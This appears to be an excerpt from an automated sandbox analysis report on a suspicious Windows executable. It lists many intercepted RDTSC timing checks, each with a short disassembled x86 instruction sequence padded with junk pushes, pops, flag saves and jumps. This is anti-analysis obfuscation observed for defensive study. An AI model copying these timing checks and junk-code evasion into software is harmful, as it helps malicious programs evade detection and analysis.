Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0D98 second address: 71F0D9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0D9C second address: 71F0DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0E59 second address: 71F0E5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0E5F second address: 71F0EB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+0Ch], eax 0x0000000e jmp 00007F7620C9DE4Eh 0x00000013 mov edx, 772406ECh 0x00000018 pushad 0x00000019 push esi 0x0000001a mov bh, FBh 0x0000001c pop esi 0x0000001d popad 0x0000001e mov eax, 00000000h 0x00000023 jmp 00007F7620C9DE4Eh 0x00000028 lock cmpxchg dword ptr [edx], ecx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F7620C9DE4Ah 0x00000035 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0EB3 second address: 71F0EC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC87Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0EC2 second address: 71F0EC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0EC7 second address: 71F0F4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b mov edx, 3CD31440h 0x00000010 pushfd 0x00000011 jmp 00007F7620BAC889h 0x00000016 sbb cl, 00000046h 0x00000019 jmp 00007F7620BAC881h 0x0000001e popfd 0x0000001f popad 0x00000020 test eax, eax 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F7620BAC87Ch 0x00000029 add ch, FFFFFFE8h 0x0000002c jmp 00007F7620BAC87Bh 0x00000031 popfd 0x00000032 mov dx, ax 0x00000035 popad 0x00000036 jne 00007F7690B7B028h 0x0000003c jmp 00007F7620BAC882h 0x00000041 mov edx, dword ptr [ebp+08h] 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0F4B second address: 71F0F4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0F4F second address: 71F0F53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0F53 second address: 71F0F59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0F59 second address: 71F0F5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0F5F second address: 71F0F63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0F63 second address: 71F0FE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC87Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi] 0x0000000d jmp 00007F7620BAC880h 0x00000012 mov dword ptr [edx], eax 0x00000014 pushad 0x00000015 mov ebx, eax 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F7620BAC888h 0x0000001e jmp 00007F7620BAC885h 0x00000023 popfd 0x00000024 jmp 00007F7620BAC880h 0x00000029 popad 0x0000002a popad 0x0000002b mov eax, dword ptr [esi+04h] 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F7620BAC87Ah 0x00000037 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0FE1 second address: 71F0FF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0FF0 second address: 71F104A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC889h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+04h], eax 0x0000000c pushad 0x0000000d mov esi, 11EA82C3h 0x00000012 pushfd 0x00000013 jmp 00007F7620BAC888h 0x00000018 or si, 6D88h 0x0000001d jmp 00007F7620BAC87Bh 0x00000022 popfd 0x00000023 popad 0x00000024 mov eax, dword ptr [esi+08h] 0x00000027 pushad 0x00000028 pushad 0x00000029 pushad 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F104A second address: 71F10A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov ebx, ecx 0x00000007 popad 0x00000008 mov dword ptr [edx+08h], eax 0x0000000b pushad 0x0000000c mov ax, 6685h 0x00000010 push eax 0x00000011 pushfd 0x00000012 jmp 00007F7620C9DE51h 0x00000017 adc si, 4B56h 0x0000001c jmp 00007F7620C9DE51h 0x00000021 popfd 0x00000022 pop eax 0x00000023 popad 0x00000024 mov eax, dword ptr [esi+0Ch] 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F7620C9DE59h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F10A6 second address: 71F10BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC881h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F10BB second address: 71F1126 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007F7620C9DE53h 0x0000000b xor si, BA9Eh 0x00000010 jmp 00007F7620C9DE59h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [edx+0Ch], eax 0x0000001c jmp 00007F7620C9DE4Eh 0x00000021 mov eax, dword ptr [esi+10h] 0x00000024 jmp 00007F7620C9DE50h 0x00000029 mov dword ptr [edx+10h], eax 0x0000002c pushad 0x0000002d mov di, ax 0x00000030 pushad 0x00000031 mov ah, 8Dh 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F1126 second address: 71F113A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esi+14h] 0x00000009 pushad 0x0000000a mov edi, 028C9BC2h 0x0000000f push eax 0x00000010 push edx 0x00000011 movsx ebx, ax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F113A second address: 71F11C1 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7620C9DE52h 0x00000008 jmp 00007F7620C9DE55h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 mov dword ptr [edx+14h], eax 0x00000014 jmp 00007F7620C9DE4Eh 0x00000019 mov eax, dword ptr [esi+18h] 0x0000001c pushad 0x0000001d mov si, 31CDh 0x00000021 mov ecx, 6C841DC9h 0x00000026 popad 0x00000027 mov dword ptr [edx+18h], eax 0x0000002a jmp 00007F7620C9DE54h 0x0000002f mov eax, dword ptr [esi+1Ch] 0x00000032 pushad 0x00000033 mov cx, 9AADh 0x00000037 movzx esi, bx 0x0000003a popad 0x0000003b mov dword ptr [edx+1Ch], eax 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 mov esi, 4471891Dh 0x00000046 call 00007F7620C9DE4Ah 0x0000004b pop eax 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F11C1 second address: 71F1204 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7620BAC87Eh 0x00000008 pushfd 0x00000009 jmp 00007F7620BAC882h 0x0000000e and si, 9AD8h 0x00000013 jmp 00007F7620BAC87Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov eax, dword ptr [esi+20h] 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 mov eax, 0C91C5A1h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F1204 second address: 71F1255 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 4CE41ADDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [edx+20h], eax 0x0000000d jmp 00007F7620C9DE4Fh 0x00000012 mov eax, dword ptr [esi+24h] 0x00000015 jmp 00007F7620C9DE56h 0x0000001a mov dword ptr [edx+24h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F7620C9DE57h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F1255 second address: 71F1298 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC889h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+28h] 0x0000000c pushad 0x0000000d pushad 0x0000000e mov esi, 16EE7479h 0x00000013 popad 0x00000014 mov ah, dl 0x00000016 popad 0x00000017 mov dword ptr [edx+28h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F7620BAC883h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F1298 second address: 71F129E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F129E second address: 71F12A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F12A2 second address: 71F12DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [esi+2Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F7620C9DE58h 0x00000013 jmp 00007F7620C9DE52h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F12DB second address: 71F12ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7620BAC87Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F12ED second address: 71F13BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+2Ch], ecx 0x0000000e jmp 00007F7620C9DE56h 0x00000013 mov ax, word ptr [esi+30h] 0x00000017 jmp 00007F7620C9DE50h 0x0000001c mov word ptr [edx+30h], ax 0x00000020 pushad 0x00000021 mov edi, ecx 0x00000023 popad 0x00000024 mov ax, word ptr [esi+32h] 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F7620C9DE55h 0x0000002f and esi, 7AF8C826h 0x00000035 jmp 00007F7620C9DE51h 0x0000003a popfd 0x0000003b pushfd 0x0000003c jmp 00007F7620C9DE50h 0x00000041 xor cx, B1C8h 0x00000046 jmp 00007F7620C9DE4Bh 0x0000004b popfd 0x0000004c popad 0x0000004d mov word ptr [edx+32h], ax 0x00000051 jmp 00007F7620C9DE56h 0x00000056 mov eax, dword ptr [esi+34h] 0x00000059 pushad 0x0000005a pushad 0x0000005b mov eax, 6811DFC3h 0x00000060 push ecx 0x00000061 pop edi 0x00000062 popad 0x00000063 mov ebx, esi 0x00000065 popad 0x00000066 mov dword ptr [edx+34h], eax 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d pushad 0x0000006e popad 0x0000006f rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F13BC second address: 71F13C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F13C0 second address: 71F13C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F13C6 second address: 71F13CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F13CC second address: 71F13D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F13D0 second address: 71F1485 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC87Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test ecx, 00000700h 0x00000011 jmp 00007F7620BAC880h 0x00000016 jne 00007F7690B7AB95h 0x0000001c pushad 0x0000001d mov edi, eax 0x0000001f mov edi, eax 0x00000021 popad 0x00000022 or dword ptr [edx+38h], FFFFFFFFh 0x00000026 pushad 0x00000027 jmp 00007F7620BAC882h 0x0000002c popad 0x0000002d or dword ptr [edx+3Ch], FFFFFFFFh 0x00000031 jmp 00007F7620BAC887h 0x00000036 or dword ptr [edx+40h], FFFFFFFFh 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007F7620BAC884h 0x00000041 sbb esi, 0CD1C0D8h 0x00000047 jmp 00007F7620BAC87Bh 0x0000004c popfd 0x0000004d pushad 0x0000004e mov cl, 5Ah 0x00000050 mov ecx, edi 0x00000052 popad 0x00000053 popad 0x00000054 pop esi 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007F7620BAC888h 0x0000005c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71E0626 second address: 71E062A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71E062A second address: 71E068D instructions: 0x00000000 rdtsc 0x00000002 mov edx, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F7620BAC886h 0x0000000d push eax 0x0000000e pushad 0x0000000f call 00007F7620BAC87Dh 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e pushfd 0x0000001f jmp 00007F7620BAC884h 0x00000024 jmp 00007F7620BAC885h 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71E068D second address: 71E0693 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71E0693 second address: 71E0697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71E0697 second address: 71E06B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7620C9DE51h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71E06B6 second address: 71E06BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71E06BA second address: 71E06C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71E06C0 second address: 71E06C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71E06C6 second address: 71E06CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7180015 second address: 7180032 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC889h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7180032 second address: 7180038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7180038 second address: 7180045 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 718069E second address: 71806FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F7620C9DE4Ah 0x0000000a or si, 1098h 0x0000000f jmp 00007F7620C9DE4Bh 0x00000014 popfd 0x00000015 popad 0x00000016 mov edi, esi 0x00000018 popad 0x00000019 push eax 0x0000001a jmp 00007F7620C9DE55h 0x0000001f xchg eax, ebp 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F7620C9DE4Ch 0x00000027 or al, 00000028h 0x0000002a jmp 00007F7620C9DE4Bh 0x0000002f popfd 0x00000030 push eax 0x00000031 push edx 0x00000032 mov bx, ax 0x00000035 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71806FB second address: 718074B instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7620BAC882h 0x00000008 sbb cx, 8488h 0x0000000d jmp 00007F7620BAC87Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 jmp 00007F7620BAC886h 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F7620BAC87Ah 0x00000027 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 718074B second address: 718074F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 718074F second address: 7180755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71D0BBC second address: 71D0BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71D0BC1 second address: 71D0BDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7620BAC881h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71D0BDF second address: 71D0BE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71D0BE7 second address: 71D0BF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71D0BF6 second address: 71D0C59 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7620C9DE4Eh 0x00000008 and ecx, 212A7328h 0x0000000e jmp 00007F7620C9DE4Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007F7620C9DE58h 0x0000001c sbb ch, FFFFFF88h 0x0000001f jmp 00007F7620C9DE4Bh 0x00000024 popfd 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b jmp 00007F7620C9DE4Bh 0x00000030 mov cx, 80EFh 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71D0C59 second address: 71D0C7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC885h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx ebx, ax 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71B004B second address: 71B0051 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71B0051 second address: 71B009E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC87Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F7620BAC87Eh 0x00000011 push eax 0x00000012 jmp 00007F7620BAC87Bh 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F7620BAC886h 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71B009E second address: 71B00A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71B00A2 second address: 71B00A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71B00A8 second address: 71B00AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71B00AE second address: 71B00B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71B00B2 second address: 71B00E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and esp, FFFFFFF0h 0x0000000e jmp 00007F7620C9DE50h 0x00000013 sub esp, 44h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71B00E2 second address: 71B00E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71B00E6 second address: 71B0103 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71B0103 second address: 71B0109 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71B0109 second address: 71B016B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F7620C9DE54h 0x0000000e mov dword ptr [esp], ebx 0x00000011 jmp 00007F7620C9DE50h 0x00000016 xchg eax, esi 0x00000017 jmp 00007F7620C9DE50h 0x0000001c push eax 0x0000001d jmp 00007F7620C9DE4Bh 0x00000022 xchg eax, esi 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F7620C9DE50h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71B016B second address: 71B017A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC87Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71B017A second address: 71B01B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F7620C9DE4Ch 0x00000011 and ch, 00000008h 0x00000014 jmp 00007F7620C9DE4Bh 0x00000019 popfd 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
